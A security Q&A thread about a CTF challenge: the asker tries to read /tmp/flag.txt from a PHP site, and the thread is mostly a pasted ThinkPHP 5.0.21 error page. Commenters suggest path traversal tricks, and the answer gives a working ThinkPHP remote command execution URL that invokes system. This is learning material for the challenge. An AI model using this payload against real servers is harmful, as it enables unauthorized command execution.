# How do I escape webapp root directory in a php website?

Tags: web-application, php, directory-traversal

This is part of a old CTF question which I've had trouble solving. I'm not sure what approach to take.

I'm given a single site:

http://user:token@host:port/public/index.php

the flag is in /tmp/flag.txt

Index.php is basically a plain text file with the basic instructions for every question. The first question is to breakout of the webapp environment and get the flag in the tmp folder.

There doesn't see to be any parameter injection I can use as far as I can see. Entering

http://user:token@host:port/../../tmp/flag.txt

just gets truncated to

http://user:token@host:port/tmp/flag.txt

and gives a 404. The only other page is if you enter something non existent under public

http://user:token@host:port/public/foobar.php or http://user:token@host:port/public/foobar

which gives a better formatted 404

```
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>System Error</title>
    <meta name="robots" content="noindex,nofollow" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <style>
        /* Base */
        body {
            color: #333;
            font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif;
            margin: 0;
            padding: 0 20px 20px;
            word-break: break-word;
        }
        h1{
            margin: 10px 0 0;
            font-size: 28px;
            font-weight: 500;
            line-height: 32px;
        }
        h2{
            color: #4288ce;
            font-weight: 400;
            padding: 6px 0;
            margin: 6px 0 0;
            font-size: 18px;
            border-bottom: 1px solid #eee;
        }
        h3.subheading {
            color: #4288ce;
            margin: 6px 0 0;
            font-weight: 400;
        }
        h3{
            margin: 12px;
            font-size: 16px;
            font-weight: bold;
        }
        abbr{
            cursor: help;
            text-decoration: underline;
            text-decoration-style: dotted;
        }
        a{
            color: #868686;
            cursor: pointer;
        }
        a:hover{
            text-decoration: underline;
        }
        .line-error{
            background: #f8cbcb;
        }

        .echo table {
            width: 100%;
        }

        .echo pre {
            padding: 16px;
            overflow: auto;
            font-size: 85%;
            line-height: 1.45;
            background-color: #f7f7f7;
            border: 0;
            border-radius: 3px;
            font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
        }

        .echo pre > pre {
            padding: 0;
            margin: 0;
        }
        /* Layout */
        .col-md-3 {
            width: 25%;
        }
        .col-md-9 {
            width: 75%;
        }
        [class^="col-md-"] {
            float: left;
        }
        .clearfix {
            clear:both;
        }
        @media only screen 
        and (min-device-width : 375px) 
        and (max-device-width : 667px) { 
            .col-md-3,
            .col-md-9 {
                width: 100%;
            }
        }
        /* Exception Info */
        .exception {
            margin-top: 20px;
        }
        .exception .message{
            padding: 12px;
            border: 1px solid #ddd;
            border-bottom: 0 none;
            line-height: 18px;
            font-size:16px;
            border-top-left-radius: 4px;
            border-top-right-radius: 4px;
            font-family: Consolas,"Liberation Mono",Courier,Verdana,"微软雅黑";
        }

        .exception .code{
            float: left;
            text-align: center;
            color: #fff;
            margin-right: 12px;
            padding: 16px;
            border-radius: 4px;
            background: #999;
        }
        .exception .source-code{
            padding: 6px;
            border: 1px solid #ddd;

            background: #f9f9f9;
            overflow-x: auto;

        }
        .exception .source-code pre{
            margin: 0;
        }
        .exception .source-code pre ol{
            margin: 0;
            color: #4288ce;
            display: inline-block;
            min-width: 100%;
            box-sizing: border-box;
        font-size:14px;
            font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana;
            padding-left: 40px;
        }
        .exception .source-code pre li{
            border-left: 1px solid #ddd;
            height: 18px;
            line-height: 18px;
        }
        .exception .source-code pre code{
            color: #333;
            height: 100%;
            display: inline-block;
            border-left: 1px solid #fff;
        font-size:14px;
            font-family: Consolas,"Liberation Mono",Courier,Verdana,"微软雅黑";
        }
        .exception .trace{
            padding: 6px;
            border: 1px solid #ddd;
            border-top: 0 none;
            line-height: 16px;
        font-size:14px;
            font-family: Consolas,"Liberation Mono",Courier,Verdana,"微软雅黑";
        }
        .exception .trace ol{
            margin: 12px;
        }
        .exception .trace ol li{
            padding: 2px 4px;
        }
        .exception div:last-child{
            border-bottom-left-radius: 4px;
            border-bottom-right-radius: 4px;
        }

        /* Exception Variables */
        .exception-var table{
            width: 100%;
            margin: 12px 0;
            box-sizing: border-box;
            table-layout:fixed;
            word-wrap:break-word;            
        }
        .exception-var table caption{
            text-align: left;
            font-size: 16px;
            font-weight: bold;
            padding: 6px 0;
        }
        .exception-var table caption small{
            font-weight: 300;
            display: inline-block;
            margin-left: 10px;
            color: #ccc;
        }
        .exception-var table tbody{
            font-size: 13px;
            font-family: Consolas,"Liberation Mono",Courier,"微软雅黑";
        }
        .exception-var table td{
            padding: 0 6px;
            vertical-align: top;
            word-break: break-all;
        }
        .exception-var table td:first-child{
            width: 28%;
            font-weight: bold;
            white-space: nowrap;
        }
        .exception-var table td pre{
            margin: 0;
        }

        /* Copyright Info */
        .copyright{
            margin-top: 24px;
            padding: 12px 0;
            border-top: 1px solid #eee;
        }

        /* SPAN elements with the classes below are added by prettyprint. */
        pre.prettyprint .pln { color: #000 }  /* plain text */
        pre.prettyprint .str { color: #080 }  /* string content */
        pre.prettyprint .kwd { color: #008 }  /* a keyword */
        pre.prettyprint .com { color: #800 }  /* a comment */
        pre.prettyprint .typ { color: #606 }  /* a type name */
        pre.prettyprint .lit { color: #066 }  /* a literal value */
        /* punctuation, lisp open bracket, lisp close bracket */
        pre.prettyprint .pun, pre.prettyprint .opn, pre.prettyprint .clo { color: #660 }
        pre.prettyprint .tag { color: #008 }  /* a markup tag name */
        pre.prettyprint .atn { color: #606 }  /* a markup attribute name */
        pre.prettyprint .atv { color: #080 }  /* a markup attribute value */
        pre.prettyprint .dec, pre.prettyprint .var { color: #606 }  /* a declaration; a variable name */
        pre.prettyprint .fun { color: red }  /* a function name */
    </style>
</head>
<body>
    <div class="echo">
            </div>
        <div class="exception">

            <div class="info"><h1>页面错误！请稍后再试～</h1></div>

    </div>



    <div class="copyright">
        <a title="官方网站" href="http://www.thinkphp.cn">ThinkPHP</a> 
        <span>V5.0.21</span> 
        <span>{ 十年磨一剑-为API开发设计的高性能框架 }</span>
    </div>
    </body>
</html>
```

I feel like this question should be about path traversal vulnerabilities but I'm quite a beginner and not sure where to start. How should I approach this?

Comment: This cannot be answered from the info you have provided us

Comment: Try an absolute path, along the lines of `http://site.example//tmp/flag.txt`. (Notice the additional `/`)

Comment: Could it be that your browser resolves the path? If I go to `example.com/test/../`, I can see in the Firefox dev tools (F12 -> network tab) that it immediately tries to open `example.com/` without ever requesting `example.com/test/../` from the web server. You can work around this using curl: `curl https://example.com/test/../` will actually do the request you ask of it.

Comment: @Luc yea I've actually tried that, but requesting http://user:token@host:port/../../tmp/flag.txt still gives a 404 error saying 
"/tmp/flag.txt is not available on this server ", the same error as requesting from browser. I'm not experienced enough to know whether this is because of santization done on the server side or if this is normal behavior.

Comment: @Arminius trying absolute path doesn't seem to work :(

Answer (score 3):

I found out the answer from someone else. The error response with the link to ThinkPhp was the hint, the website was built using the ThinkPhP cms/framework.

A google search of ThinkPhp vulnerabilities shows that you can execute shell commands through the URL of the form

```
public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
```

and it executes it.

Again was kind of hard to solve given the information so thanks for those who gave suggestions, I guess the take away is to use all the information you have as it may be a hint.